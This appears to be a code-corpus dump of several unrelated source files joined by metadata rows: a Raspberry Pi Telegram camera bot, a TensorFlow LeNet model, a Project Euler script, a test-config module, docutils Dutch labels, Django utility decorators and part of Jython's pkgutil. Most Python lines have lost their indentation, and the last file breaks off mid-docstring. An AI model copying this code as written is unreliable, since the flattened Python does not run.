if not os.path.exists('/proc/%s' % pid):
message.reply_text('Motion software has been stopped.')
return
time.sleep(1)
message.reply_text("Could not terminate process. Trying to kill it...")
try:
os.kill(pid, signal.SIGKILL)
except OSError:
# ignore if already gone
pass
# wait for process to terminate, can take some time
for i in range(10):
if not os.path.exists('/proc/%s' % pid):
message.reply_text('Motion software has been stopped.')
return
time.sleep(1)
message.reply_text('Error: Unable to stop motion software.')
def commandKill(self, update):
message = update.message
if not self.useMotion:
message.reply_text('Error: kill command only supported when motion is enabled')
return
killCmd = shlex.split('killall -9 %s' % self.config['motion']['kill_name'])
try:
subprocess.call(killCmd)
except:
self.logger.exception('Failed to send kill signal:')
message.reply_text('Error: Failed to send kill signal. See log for details.')
return
message.reply_text('Kill signal has been sent.')
def commandStatus(self, update):
message = update.message
if not self.isArmed:
message.reply_text('Motion-based capturing not enabled.')
return
image_dir = self.config['general']['image_dir']
if not os.path.exists(image_dir):
message.reply_text('Error: Motion-based capturing enabled but image dir not available!')
return
if self.useMotion:
# check if motion software is running or died unexpectedly
if not self.isMotionRunning():
message.reply_text('Error: Motion-based capturing enabled but motion software not running!')
return
message.reply_text('Motion-based capturing enabled and motion software running.')
else:
message.reply_text('Motion-based capturing enabled.')
def commandCapture(self, update):
message = update.message
message.reply_text('Capture in progress, please wait...')
# enable capture LED(s)
if self.hasCaptureLED:
self.setCaptureLED(True)
# enqueue buzzer sequence
if self.hasBuzzer:
sequence = self.config['buzzer']['seq_capture']
if len(sequence) > 0:
self.buzzerQueue.put(sequence)
capture_file = self.config['capture']['file']
if os.path.exists(capture_file):
os.remove(capture_file)
captureCmd = shlex.split(self.config['capture']['cmd'])
try:
subprocess.call(captureCmd)
except:
self.logger.exception('Capture failed:')
message.reply_text('Error: Capture failed. See log for details.')
return
finally:
# always disable capture LEDs
self.setCaptureLED(False)
if not os.path.exists(capture_file):
message.reply_text('Error: Capture file not found: "%s"' % capture_file)
return
message.reply_photo(photo=open(capture_file, 'rb'))
if self.config['general']['delete_images']:
os.remove(capture_file)
def commandHelp(self, update):
message = update.message
message.reply_text(
'/arm - Enable motion-based capturing.\n'
'/disarm - Disable motion-based capturing.\n'
'/capture - Take a single shot.\n'
'/status - Show current mode.\n'
'/kill - Kill motion software, if enabled.\n'
'/ledtoggle - Toggle capture LED, if configured.\n'
'/ledstatus - Show state of capture LED (on/off), if configured.\n'
'/buzzer - Trigger buzzer, if configured.\n'
'/help - Show this help.')
def commandLEDToggle(self, update):
message = update.message
if self.hasCaptureLED == False:
message.reply_text('No capture LED configured.')
return
self.setCaptureLED(not self.isCaptureLEDOn)
# report state back
self.commandLEDStatus(update)
def commandLEDStatus(self, update):
message = update.message
if self.hasCaptureLED == False:
message.reply_text('No capture LED configured.')
return
message.reply_text('Capture LED is %s.' % ('on' if self.isCaptureLEDOn else 'off'))
def commandBuzzer(self, update):
message = update.message
if self.hasBuzzer == False:
message.reply_text('No buzzer configured.')
return
sequence = self.config['buzzer']['seq_buzzer']
if len(sequence) > 0:
self.buzzerQueue.put(sequence)
def watchImageDir(self):
self.logger.info('Setting up image watch thread')
# set up image directory watch
watchDir = self.config['general']['image_dir']
# purge (remove and re-create) if we allowed to do so
if self.config['general']['delete_images']:
shutil.rmtree(watchDir, ignore_errors=True)
if not os.path.exists(watchDir):
os.makedirs(watchDir) # racy but we don't care
notify = inotify.adapters.Inotify()
notify.add_watch(watchDir)
# only watch for created and renamed files
matchedTypes = ['IN_CLOSE_WRITE', 'IN_MOVED_TO']
ownerIDs = self.config['telegram']['owner_ids']
deleteImages = self.config['general']['delete_images']
bot = self.updater.dispatcher.bot
# check for new events
# (runs forever but we could bail out: check for event being None
# which always indicates the last event)
for event in notify.event_gen():
if event is None:
continue
(header, typeNames, watch_path, filename) = event
if not any(type in typeNames for type in matchedTypes):
continue
filepath = ('%s/%s' % (watch_path, filename))
if not filename.endswith('.jpg'):
self.logger.info('New non-image file: "%s" - ignored' % filepath)
continue
self.logger.info('New image file: "%s"' % filepath)
if self.isArmed:
for ownerID in ownerIDs:
try:
bot.sendPhoto(chat_id=ownerID, caption=filepath, photo=open(filepath, 'rb'))
except:
# most likely network problem or user has blocked the bot
                        self.logger.exception('Could not send image to user %s:' % ownerID)
# always delete image, even if reporting is disabled
if deleteImages:
os.remove(filepath)
def getMotionPID(self):
pid_file = self.config['motion']['pid_file']
if not os.path.exists(pid_file):
return None
with open(pid_file, 'r') as f:
pid = f.read().rstrip()
return int(pid)
def isMotionRunning(self):
pid = self.getMotionPID()
return os.path.exists('/proc/%s' % pid)
def watchPIR(self):
self.logger.info('Setting up PIR watch thread')
sequence = None
if self.hasBuzzer:
sequence = self.config['buzzer']['seq_motion']
if len(sequence) == 0:
sequence = None
captureCmd = shlex.split(self.config['pir']['capture_cmd'])
gpio = self.config['pir']['gpio']
self.GPIO.setup(gpio, self.GPIO.IN)
while True:
if not self.isArmed:
# motion detection currently disabled
time.sleep(0.1)
continue
pir = self.GPIO.input(gpio)
if pir == 0:
# no motion detected
time.sleep(0.1)
continue
self.logger.info('PIR: motion detected')
if sequence:
self.buzzerQueue.put(sequence)
# enable capture LED(s)
if self.hasCaptureLED:
self.setCaptureLED(True)
try:
subprocess.call(captureCmd)
            except:
                # no Telegram chat context in this thread, so only log the failure
                self.logger.exception('Error: Capture failed:')
finally:
# always disable capture LEDs
self.setCaptureLED(False)
def watchBuzzerQueue(self):
self.logger.info('Setting up buzzer thread')
gpio = self.config['buzzer']['gpio']
self.GPIO.setup(gpio, self.GPIO.OUT)
duration = self.config['buzzer']['duration']
self.buzzerQueue = queue.SimpleQueue()
# play arm sequence if we are armed right on startup
if self.isArmed:
sequence = self.config['buzzer']['seq_arm']
if len(sequence) > 0:
self.buzzerQueue.put(sequence)
while True:
# wait for queued items and play them
sequence = self.buzzerQueue.get(block=True, timeout=None)
self.playSequence(sequence, duration, gpio)
def playSequence(self, sequence, duration, gpio):
for i in sequence:
if i == '1':
self.GPIO.output(gpio, 1)
elif i == '0':
self.GPIO.output(gpio, 0)
else:
self.logger.warning('Unknown pattern in sequence: %s', i)
time.sleep(duration)
self.GPIO.output(gpio, 0)
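    # Illustrative example (values invented): with duration 0.2 a call like
    # playSequence('101', 0.2, gpio) drives the buzzer pin high for 0.2s, low
    # for 0.2s, high for 0.2s again, and finally forces the pin low.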
def setCaptureLED(self, on):
if not self.hasCaptureLED:
self.logger.error('No capture LED configured')
return
self.GPIO.output(self.captureLEDgpio, 1 if on else 0)
self.isCaptureLEDOn = True if on else False
def cleanup(self):
if self.hasBuzzer:
try:
self.logger.info('Disabling buzzer')
gpio = self.config['buzzer']['gpio']
self.GPIO.output(gpio, 0)
except:
pass
if self.hasCaptureLED:
try:
self.logger.info('Disabling capture LED(s)')
self.setCaptureLED(False)
except:
pass
if self.GPIO is not None:
try:
self.logger.info('Cleaning up GPIO')
self.GPIO.cleanup()
except:
pass
if self.updater is not None and self.updater.running:
try:
self.logger.info('Stopping telegram updater')
self.updater.stop()
except:
pass
self.logger.info('Cleanup done')
def signalHandler(self, signal, frame):
# prevent multiple calls by different signals (e.g. SIGHUP, then SIGTERM)
if self.isShuttingDown:
return
self.isShuttingDown = True
msg = 'Caught signal %d, terminating now.' % signal
self.logger.error(msg)
# try to inform owners
if self.updater and self.updater.running:
try:
bot = self.updater.dispatcher.bot
for ownerID in self.config['telegram']['owner_ids']:
try:
bot.sendMessage(chat_id=ownerID, text=msg)
except:
pass
except:
pass
sys.exit(1)
if __name__ == '__main__':
bot = piCamBot()
bot.run()
| gpl-3.0 | 3,404,977,873,792,638,500 | 34.699849 | 118 | 0.576154 | false |
SunskyF/EasyPR-python | models/easypr/net/lenet.py | 1 | 1738 | from .layer import *
class Lenet:
def __init__(self):
self.num_classes = 65
self.x = None
self.y = None
self.keep_prob = None
self.pred_logits = None
self.pred_labels = None
self.accuracy = None
self.l2_loss = None
self.weights = []
self.biases = []
def compile(self):
self.keep_prob = tf.placeholder(tf.float32)
self.weights = []
self.biases = []
input = ImageLayer(20, 20, 1, layer_name='LENET_IMAGE')
label = LabelLayer()
convpools1 = ConvPoolLayer(input, 5, 5, 16, 2, 2, layer_name='LENET_1')
convpools2 = ConvPoolLayer(convpools1, 5, 5, 32, 2, 2, layer_name='LENET_2')
dp = DropoutLayer(convpools2, self.keep_prob, layer_name='LENET_DP')
flatten = FlattenLayer(dp, layer_name='LENET_FLATTEN')
ip1 = DenseLayer(flatten, 256, layer_name="LENET_DENSE1")
self.weights += ip1.weights
self.biases += ip1.biases
ip1_relu = ActivationLayer(ip1, layer_name='LENET_ACT')
pred = OutputLayer(ip1_relu, self.num_classes, layer_name='LENET_OUTPUT')
self.weights += pred.weights
self.biases += pred.biases
self.x = input.output
self.y = label.output
self.pred_logits = pred.output
self.pred_labels = tf.argmax(self.pred_logits, 1)
correct_pred = tf.equal(self.pred_labels, self.y)
self.accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))
for w in self.weights + self.biases:
l2_loss = tf.nn.l2_loss(w)
if self.l2_loss is None:
self.l2_loss = l2_loss
else:
self.l2_loss += l2_loss
| apache-2.0 | 3,350,835,448,973,280,000 | 27.491803 | 84 | 0.571922 | false |
tdsymonds/project-euler | scripts/problem50.py | 1 | 2019 | # https://projecteuler.net/problem=50
import math
def get_prime_list(n):
"""
Returns a list of primes < n
Function taken from:
http://stackoverflow.com/questions/2068372/fastest-way-to-list-all-primes-below-n/3035188#3035188
"""
sieve = [True] * n
for i in xrange(3,int(n**0.5)+1,2):
if sieve[i]:
sieve[i*i::2*i]=[False]*((n-i*i-1)/(2*i)+1)
return [2] + [i for i in xrange(3,n,2) if sieve[i]]
def is_prime(number, prime_list):
"""
Returns true if prime. Divides number by all primes in
the list up to the square root of the number.
"""
sqrt = math.sqrt(number)
i = 0
prime = prime_list[i]
while prime <= sqrt:
if number % prime == 0:
return False
i += 1
prime = prime_list[i]
return True
# first get a big list of primes
full_prime_list = get_prime_list(100000)
# set max number
max_number = 1000000
# reset variables
max_length = 0
max_prime = 0
# loop through each prime to start the consecutive primes list from
for index, starting_prime in enumerate(full_prime_list):
# initialise prime list
prime_list = [starting_prime]
# loop through each consecutive prime
for prime in full_prime_list[index+1:]:
# add the prime to the list
prime_list.append(prime)
# calculate the sum and length
prime_list_sum = sum(prime_list)
prime_list_length = len(prime_list)
# if the sum is greater than the max then
# no point continuing
if prime_list_sum >= max_number:
break
        # if the sum is prime and the list length is greater than the max length
if prime_list_length > 1 and is_prime(prime_list_sum, full_prime_list) and prime_list_length > max_length:
# update max length and the max prime found
max_length = prime_list_length
max_prime = prime_list_sum
# print result
print max_prime | mit | 5,817,782,502,286,328,000 | 26.871429 | 114 | 0.594849 | false |
bluepeppers/dectest | dectest/config.py | 1 | 9920 | """
The configurations system for dectest. Offers two different methods of
configuration; as a python file or from a dict. Each method is implemented in a
different class, but they all provide the same interface.
"""
import imp
import re
DEFAULTS = {
'testing': {
'testasrun': True,
'sideaffects': [],
'runtests': True,
'pretest': None,
'posttest': None,
}
}
class DummyLogger():
"""
A dummy logger to allow quite degregation.
"""
def __getattr__(self, _):
"""
Return a callable that does nothing at all.
"""
return lambda *args, **kwargs: None
class ConfigInterface():
"""
An interface that all classes implementing config methods should inherit.
    Implementing classes must provide the following methods/properties. More
    information on the required behaviour of each attribute can be found in
    their individual documentation in this class.
* store
* reload() (optional)
"""
_logger = DummyLogger()
@property
def store(self):
"""
This property must be implemented by all classes implementing the config
interface. It should be a mapping of section names to a mapping of
item names to values.
        If that doesn't make sense, this may help:
>>> conf = DefaultConfig()
>>> conf.store
{'section': {'item1': True, 'item2': 3, 'item4': "foo"}}
"""
raise NotImplementedError()
def reload(self):
"""
This method can be implemented by implementing classes, though it is
optional. When called it should reload the config from it's source.
"""
return
def get(self, section_name, item_name):
"""
Returns the config value in the given section with the given name.
If the value does not exist, then we look in the DEFAULTS global, and
if we can't find it there, we raise a warning, and return None.
"""
values = self.store
if section_name not in values:
if section_name not in DEFAULTS:
# Then we have a program error
self._logger.warning(
"Config section " + section_name +
" does not exist in config or as default")
return
section = DEFAULTS[section_name]
else:
section = values[section_name]
if item_name not in section:
if item_name not in DEFAULTS[section_name]:
self._logger.warning(
"Config value {0}.{1}".format(
section_name, item_name) +
" does not exist in config or as a default")
return
return DEFAULTS[section_name][item_name]
return section[item_name]
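    # A small illustration against the DEFAULTS mapping defined above (a
    # DefaultConfig simply uses DEFAULTS as its store):
    #
    #     >>> DefaultConfig().get('testing', 'runtests')
    #     True
    #     >>> DefaultConfig().get('testing', 'pretest') is None
    #     True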
def get_bool(self, section_name, item_name):
"""
Converts the config value into a boolean. If the value is a string, then
a number of values will be checked. The mappings are:
+-------+------+
| str | bool |
+=======+======+
|'yes' | |
+-------+ |
|'true' | True |
+-------+ |
|'y' | |
+-------+------+
|'no' | |
+-------+ |
|'false'| False|
+-------+ |
|'n' | |
+-------+------+
These values are not case sensitive. If the value is not a string or a
boolean, then `None` will be returned.
"""
value = self.get(section_name, item_name)
if isinstance(value, (str, unicode)):
bool_mapping = {
'yes': True,
'true': True,
'y': True,
'no': False,
'false': False,
'n': False,
}
if value.lower() in bool_mapping:
return bool_mapping[value.lower()]
elif isinstance(value, bool):
return value
else:
return None
def get_default(self, section_name, item_name):
"""
Returns the default value.
"""
return DEFAULTS[section_name][item_name]
def get_list(self, section_name, item_name):
"""
Returns the config value at the given section as a list.
If the value is not a string, then it will be converted into a list by
calling `list(value)`. If the value is a string, it will be treated as a
        CSV, split on commas, and returned.
If the value converted to a list is empty, or the value could not be
converted, then `None` will be returned.
"""
value = self.get(section_name, item_name)
if isinstance(value, (str, unicode)):
return value.split(",") or None
else:
try:
return list(value) or None
except TypeError:
return None
def get_python(self, name):
"""
Tries to return the object at the given name. If the object cannot be
found, then `None` is returned.
The name of an object is it's module name and then the identifier that
you would have to type to access the object. For example, in the module
`dectest.suite`, there is the class `TestSuite`. The name for that item
would be `dectest.suite.TestSuite`.
If the `name` argument is not a `str` or `unicode`, then it will just be
returned.
"""
if not isinstance(name, (str, unicode)):
return name
path = name.split(".")
if len(path) < 2:
self._logger.warning("Invalid python path: " + name)
return
module_path = path[:-1]
attribute_path = [path[-1]]
module = self._import_module('.'.join(module_path))
while not module:
if not path:
raise Warning("Could not find module for python path " +
name)
return
attribute_path.insert(0, module_path.pop())
module = self._import_module('.'.join(module_path))
current = module
for attribute in attribute_path:
current = getattr(current, attribute)
if not current:
self._logger.warning("Could not find attribute for python" +
" path " + name)
return
return current
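    # Usage sketch (the dotted path mirrors the example in the docstring; any
    # importable object resolves the same way):
    #
    #     >>> config.get_python('dectest.suite.TestSuite')
    #     <class 'dectest.suite.TestSuite'>
    #
    # Paths that cannot be resolved are logged as warnings and yield None.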
def set_logger(self, logger):
"""
Sets the logger that the config class can use to report any errors or
warnings in ``get_foo`` methods.
"""
self._logger = logger
def _import_module(self, name):
"""
Imports an arbitrarily named module, and returns the module object if
the import succeeds, otherwise returns `None`.
"""
try:
module = __import__(name, fromlist=name.split(".")[:-1])
except ImportError:
return
else:
return module
def __getattr__(self, section_name):
"""
Allow us to do `config.section.item` instead of
`config.get("section", "item")`
"""
if re.match("__(\w*)__", section_name):
raise AttributeError()
class Section():
"""
Just a little class to wrap a ConfigInterface.get call.
"""
def __getattr__(_, item_name):
"""
Return the actual value.
"""
return self.get(section_name, item_name)
return Section()
class DefaultConfig(ConfigInterface):
"""
A config class that only provides the default values for every setting. Use
this when no config file is provided.
"""
store = DEFAULTS
class PythonFileConfig(ConfigInterface):
"""
A config class that loads the dictionary from the global namespace of any
given python file.
The file should define a class for each section, with attributes for each
value. The class names and attribute names are not case sensitive
For example::
# dectest_config.py
class section1:
item1 = 0
item2 = "one"
item3 = True
class section2:
foo = "bar"
"""
def __init__(self, filename):
"""
Set the filename, and load it.
"""
self.filename = filename
# We set this as if the reload method fails, store may be unbound
self.store = {}
self.reload()
def reload(self):
"""
Reloads the configuration file, and populates the store attribute.
"""
try:
module = imp.load_source('config', self.filename)
except Exception as e:
self.store = DEFAULTS
self._logger.warning("Could not load configuration file " +
self.filename + ", raised exception " +
str(e))
return
self.store = {}
for s_name, s_value in module.__dict__.items():
if s_name.startswith("_") or not type(s_value) == type:
continue
self.store[s_name] = {}
for i_name, i_value in s_value.__dict__.items():
self.store[s_name][i_name] = i_value
class DictConfig(ConfigInterface):
"""
Provides a simple way of configuring dectest via a dictionary.
Takes a dictionary as it's only argument.
"""
def __init__(self, dictionary):
self.store = dictionary
| lgpl-3.0 | 6,663,564,968,980,631,000 | 30.897106 | 80 | 0.520766 | false |
garinh/cs | docs/support/docutils/languages/nl.py | 1 | 1918 | # Author: Martijn Pieters
# Contact: [email protected]
# Revision: $Revision: 21817 $
# Date: $Date: 2005-07-21 13:39:57 -0700 (Thu, 21 Jul 2005) $
# Copyright: This module has been placed in the public domain.
# New language mappings are welcome. Before doing a new translation, please
# read <http://docutils.sf.net/docs/howto/i18n.html>. Two files must be
# translated for each language: one in docutils/languages, the other in
# docutils/parsers/rst/languages.
"""
Dutch-language mappings for language-dependent features of Docutils.
"""
__docformat__ = 'reStructuredText'
labels = {
# fixed: language-dependent
'author': 'Auteur',
'authors': 'Auteurs',
'organization': 'Organisatie',
'address': 'Adres',
'contact': 'Contact',
'version': 'Versie',
'revision': 'Revisie',
'status': 'Status',
'date': 'Datum',
'copyright': 'Copyright',
'dedication': 'Toewijding',
'abstract': 'Samenvatting',
'attention': 'Attentie!',
'caution': 'Let op!',
'danger': '!GEVAAR!',
'error': 'Fout',
'hint': 'Hint',
'important': 'Belangrijk',
'note': 'Opmerking',
'tip': 'Tip',
'warning': 'Waarschuwing',
'contents': 'Inhoud'}
"""Mapping of node class name to label text."""
bibliographic_fields = {
# language-dependent: fixed
'auteur': 'author',
'auteurs': 'authors',
'organisatie': 'organization',
'adres': 'address',
'contact': 'contact',
'versie': 'version',
'revisie': 'revision',
'status': 'status',
'datum': 'date',
'copyright': 'copyright',
'toewijding': 'dedication',
'samenvatting': 'abstract'}
"""Dutch (lowcased) to canonical name mapping for bibliographic fields."""
author_separators = [';', ',']
"""List of separator strings for the 'Authors' bibliographic field. Tried in
order."""
| lgpl-2.1 | -12,215,509,055,997,698 | 29.935484 | 76 | 0.61366 | false |
karthikrish/django-utils | djutils/decorators.py | 1 | 3986 | import atexit
import Queue
import re
import time
import threading
from django.conf import settings
from django.core.cache import cache
from django.http import HttpResponseForbidden, HttpResponseRedirect
from django.utils.functional import wraps
from djutils.cache import key_from_args
class EmptyObject(object):
pass
def cached_for_model(cache_timeout=300):
"""
Model method decorator that caches the return value for the given time.
Usage::
class MyModel(models.Model):
...
@cached_for_model(60)
def get_expensive_data(self, some_arg):
# do expensive calculations here
return data
"""
def decorator(func):
def cache_key_for_function(instance, *args, **kwargs):
klass = type(instance)._meta.module_name
hashed = key_from_args((args, kwargs))
return 'djutils.%s.cached.%s.%s.%s.%s' % (
settings.SITE_ID, klass, func.__name__, instance.pk, hashed
)
@wraps(func)
def inner(self, *args, **kwargs):
key = cache_key_for_function(self, *args, **kwargs)
result = cache.get(key, EmptyObject)
if result is EmptyObject or settings.DEBUG:
result = func(self, *args, **kwargs)
cache.set(key, result, cache_timeout)
return result
return inner
return decorator
def throttle(methods_or_func, limit=3, duration=900):
"""
Throttle the given function, returning 403s if limit exceeded
Example::
# limit to 5 POST or PUT requests per 5 minutes:
@throttle(['POST', 'PUT'], 5, 300)
def my_view(request, ...):
# do some stuff
# limit to 3 POST requests per 15 minutes:
@throttle
def my_other_view(request, ...):
            # ...
"""
if callable(methods_or_func):
methods = ('POST',)
else:
methods = methods_or_func
def decorator(func):
@wraps(func)
def inner(request, *args, **kwargs):
if request.method in methods:
remote_addr = request.META.get('HTTP_X_FORWARDED_FOR') or \
request.META.get('REMOTE_ADDR')
if remote_addr:
key = re.sub(r'[^0-9\.]', '', remote_addr)
cached = cache.get(key)
if cached == limit:
return HttpResponseForbidden('Try slowing down a little.')
elif not cached:
cache.set(key, 1, duration)
else:
cache.incr(key)
return func(request, *args, **kwargs)
return inner
if callable(methods_or_func):
return decorator(methods_or_func)
return decorator
def memoize(func):
func._memoize_cache = {}
@wraps(func)
def inner(*args, **kwargs):
key = (args, tuple(kwargs.items()))
if key not in func._memoize_cache:
func._memoize_cache[key] = func(*args, **kwargs)
return func._memoize_cache[key]
return inner
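# Illustrative use of memoize (example only, not part of the original module):
# results are cached per (args, kwargs) pair, so arguments must be hashable.
#
#     @memoize
#     def fib(n):
#         return n if n < 2 else fib(n - 1) + fib(n - 2)
#
#     fib(30)  # computed once; repeated calls are served from _memoize_cache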
def worker_thread():
while 1:
func, args, kwargs = queue.get()
try:
func(*args, **kwargs)
except:
pass # <-- log error here
finally:
queue.task_done()
def async(func):
"""
Execute the function asynchronously in a separate thread
"""
@wraps(func)
def inner(*args, **kwargs):
queue.put((func, args, kwargs))
return inner
queue = Queue.Queue()
for i in range(getattr(settings, 'DJANGO_UTILS_WORKER_THREADS', 1)):
thread = threading.Thread(target=worker_thread)
thread.daemon = True
thread.start()
def cleanup():
queue.join()
atexit.register(cleanup)
| mit | 6,624,859,138,889,896,000 | 26.874126 | 82 | 0.540642 | false |
babble/babble | include/jython/Lib/pkgutil.py | 1 | 18826 | """Utilities to support packages."""
# NOTE: This module must remain compatible with Python 2.3, as it is shared
# by setuptools for distribution with Python 2.3 and up.
import os
import sys
import imp
import os.path
from types import ModuleType
from org.python.core import imp as _imp, BytecodeLoader
__all__ = [
'get_importer', 'iter_importers', 'get_loader', 'find_loader',
'walk_packages', 'iter_modules',
'ImpImporter', 'ImpLoader', 'read_code', 'extend_path',
]
# equivalent to CPythonLib's pkgutil.read_code except that we need
# diff args to pass into our underlying imp implementation, as
# accessed by _imp here
def read_jython_code(fullname, file, filename):
data = _imp.readCode(filename, file, False)
return BytecodeLoader.makeCode(fullname + "$py", data, filename)
def simplegeneric(func):
"""Make a trivial single-dispatch generic function"""
registry = {}
def wrapper(*args, **kw):
ob = args[0]
try:
cls = ob.__class__
except AttributeError:
cls = type(ob)
try:
mro = cls.__mro__
except AttributeError:
try:
class cls(cls, object):
pass
mro = cls.__mro__[1:]
except TypeError:
mro = object, # must be an ExtensionClass or some such :(
for t in mro:
if t in registry:
return registry[t](*args, **kw)
else:
return func(*args, **kw)
try:
wrapper.__name__ = func.__name__
except (TypeError, AttributeError):
pass # Python 2.3 doesn't allow functions to be renamed
def register(typ, func=None):
if func is None:
return lambda f: register(typ, f)
registry[typ] = func
return func
wrapper.__dict__ = func.__dict__
wrapper.__doc__ = func.__doc__
wrapper.register = register
return wrapper
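# A short illustration of simplegeneric (names invented): the wrapper
# dispatches on the type of its first argument and per-type implementations
# are attached with .register().
#
#     @simplegeneric
#     def describe(obj):
#         return 'some object'
#
#     @describe.register(list)
#     def describe_list(obj):
#         return 'a list of %d items' % len(obj)
#
#     describe(3)        # -> 'some object'
#     describe([1, 2])   # -> 'a list of 2 items'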
def walk_packages(path=None, prefix='', onerror=None):
"""Yields (module_loader, name, ispkg) for all modules recursively
on path, or, if path is None, all accessible modules.
'path' should be either None or a list of paths to look for
modules in.
'prefix' is a string to output on the front of every module name
on output.
Note that this function must import all *packages* (NOT all
modules!) on the given path, in order to access the __path__
attribute to find submodules.
'onerror' is a function which gets called with one argument (the
name of the package which was being imported) if any exception
occurs while trying to import a package. If no onerror function is
supplied, ImportErrors are caught and ignored, while all other
exceptions are propagated, terminating the search.
Examples:
# list all modules python can access
walk_packages()
# list all submodules of ctypes
walk_packages(ctypes.__path__, ctypes.__name__+'.')
"""
def seen(p, m={}):
if p in m:
return True
m[p] = True
for importer, name, ispkg in iter_modules(path, prefix):
yield importer, name, ispkg
if ispkg:
try:
__import__(name)
except ImportError:
if onerror is not None:
onerror(name)
except Exception:
if onerror is not None:
onerror(name)
else:
raise
else:
path = getattr(sys.modules[name], '__path__', None) or []
# don't traverse path items we've seen before
path = [p for p in path if not seen(p)]
for item in walk_packages(path, name+'.', onerror):
yield item
def iter_modules(path=None, prefix=''):
"""Yields (module_loader, name, ispkg) for all submodules on path,
or, if path is None, all top-level modules on sys.path.
'path' should be either None or a list of paths to look for
modules in.
'prefix' is a string to output on the front of every module name
on output.
"""
if path is None:
importers = iter_importers()
else:
importers = map(get_importer, path)
yielded = {}
for i in importers:
for name, ispkg in iter_importer_modules(i, prefix):
if name not in yielded:
yielded[name] = 1
yield i, name, ispkg
#@simplegeneric
def iter_importer_modules(importer, prefix=''):
if not hasattr(importer, 'iter_modules'):
return []
return importer.iter_modules(prefix)
iter_importer_modules = simplegeneric(iter_importer_modules)
class ImpImporter:
"""PEP 302 Importer that wraps Python's "classic" import algorithm
ImpImporter(dirname) produces a PEP 302 importer that searches that
directory. ImpImporter(None) produces a PEP 302 importer that searches
the current sys.path, plus any modules that are frozen or built-in.
Note that ImpImporter does not currently support being used by placement
on sys.meta_path.
"""
def __init__(self, path=None):
self.path = path
def find_module(self, fullname, path=None):
# Note: we ignore 'path' argument since it is only used via meta_path
subname = fullname.split(".")[-1]
if subname != fullname and self.path is None:
return None
if self.path is None:
path = None
else:
path = [os.path.realpath(self.path)]
try:
file, filename, etc = imp.find_module(subname, path)
except ImportError:
return None
return ImpLoader(fullname, file, filename, etc)
def iter_modules(self, prefix=''):
if self.path is None or not os.path.isdir(self.path):
return
yielded = {}
import inspect
filenames = os.listdir(self.path)
filenames.sort() # handle packages before same-named modules
for fn in filenames:
modname = inspect.getmodulename(fn)
if modname=='__init__' or modname in yielded:
continue
path = os.path.join(self.path, fn)
ispkg = False
if not modname and os.path.isdir(path) and '.' not in fn:
modname = fn
for fn in os.listdir(path):
subname = inspect.getmodulename(fn)
if subname=='__init__':
ispkg = True
break
else:
continue # not a package
if modname and '.' not in modname:
yielded[modname] = 1
yield prefix + modname, ispkg
class ImpLoader:
"""PEP 302 Loader that wraps Python's "classic" import algorithm
"""
code = source = None
def __init__(self, fullname, file, filename, etc):
self.file = file
self.filename = filename
self.fullname = fullname
self.etc = etc
def load_module(self, fullname):
self._reopen()
try:
mod = imp.load_module(fullname, self.file, self.filename, self.etc)
finally:
if self.file:
self.file.close()
# Note: we don't set __loader__ because we want the module to look
# normal; i.e. this is just a wrapper for standard import machinery
return mod
def get_data(self, pathname):
return open(pathname, "rb").read()
def _reopen(self):
if self.file and self.file.closed:
mod_type = self.etc[2]
if mod_type==imp.PY_SOURCE:
self.file = open(self.filename, 'rU')
elif mod_type in (imp.PY_COMPILED, imp.C_EXTENSION):
self.file = open(self.filename, 'rb')
def _fix_name(self, fullname):
if fullname is None:
fullname = self.fullname
elif fullname != self.fullname:
raise ImportError("Loader for module %s cannot handle "
"module %s" % (self.fullname, fullname))
return fullname
def is_package(self, fullname):
fullname = self._fix_name(fullname)
return self.etc[2]==imp.PKG_DIRECTORY
def get_code(self, fullname=None):
fullname = self._fix_name(fullname)
if self.code is None:
mod_type = self.etc[2]
if mod_type==imp.PY_SOURCE:
source = self.get_source(fullname)
self.code = compile(source, self.filename, 'exec')
elif mod_type==imp.PY_COMPILED:
self._reopen()
try:
self.code = read_jython_code(fullname, self.file, self.filename)
finally:
self.file.close()
elif mod_type==imp.PKG_DIRECTORY:
self.code = self._get_delegate().get_code()
return self.code
def get_source(self, fullname=None):
fullname = self._fix_name(fullname)
if self.source is None:
mod_type = self.etc[2]
if mod_type==imp.PY_SOURCE:
self._reopen()
try:
self.source = self.file.read()
finally:
self.file.close()
elif mod_type==imp.PY_COMPILED:
if os.path.exists(self.filename[:-1]):
f = open(self.filename[:-1], 'rU')
self.source = f.read()
f.close()
elif mod_type==imp.PKG_DIRECTORY:
self.source = self._get_delegate().get_source()
return self.source
def _get_delegate(self):
return ImpImporter(self.filename).find_module('__init__')
def get_filename(self, fullname=None):
fullname = self._fix_name(fullname)
mod_type = self.etc[2]
if self.etc[2]==imp.PKG_DIRECTORY:
return self._get_delegate().get_filename()
elif self.etc[2] in (imp.PY_SOURCE, imp.PY_COMPILED, imp.C_EXTENSION):
return self.filename
return None
try:
import zipimport
from zipimport import zipimporter
def iter_zipimport_modules(importer, prefix=''):
dirlist = zipimport._zip_directory_cache[importer.archive].keys()
dirlist.sort()
_prefix = importer.prefix
plen = len(_prefix)
yielded = {}
import inspect
for fn in dirlist:
if not fn.startswith(_prefix):
continue
fn = fn[plen:].split(os.sep)
if len(fn)==2 and fn[1].startswith('__init__.py'):
if fn[0] not in yielded:
yielded[fn[0]] = 1
yield fn[0], True
if len(fn)!=1:
continue
modname = inspect.getmodulename(fn[0])
if modname=='__init__':
continue
if modname and '.' not in modname and modname not in yielded:
yielded[modname] = 1
yield prefix + modname, False
iter_importer_modules.register(zipimporter, iter_zipimport_modules)
except ImportError:
pass
def get_importer(path_item):
"""Retrieve a PEP 302 importer for the given path item
The returned importer is cached in sys.path_importer_cache
if it was newly created by a path hook.
If there is no importer, a wrapper around the basic import
machinery is returned. This wrapper is never inserted into
the importer cache (None is inserted instead).
The cache (or part of it) can be cleared manually if a
rescan of sys.path_hooks is necessary.
"""
try:
importer = sys.path_importer_cache[path_item]
except KeyError:
for path_hook in sys.path_hooks:
try:
importer = path_hook(path_item)
break
except ImportError:
pass
else:
importer = None
sys.path_importer_cache.setdefault(path_item, importer)
if importer is None:
try:
importer = ImpImporter(path_item)
except ImportError:
importer = None
return importer
def iter_importers(fullname=""):
"""Yield PEP 302 importers for the given module name
If fullname contains a '.', the importers will be for the package
containing fullname, otherwise they will be importers for sys.meta_path,
sys.path, and Python's "classic" import machinery, in that order. If
the named module is in a package, that package is imported as a side
effect of invoking this function.
Non PEP 302 mechanisms (e.g. the Windows registry) used by the
standard import machinery to find files in alternative locations
are partially supported, but are searched AFTER sys.path. Normally,
these locations are searched BEFORE sys.path, preventing sys.path
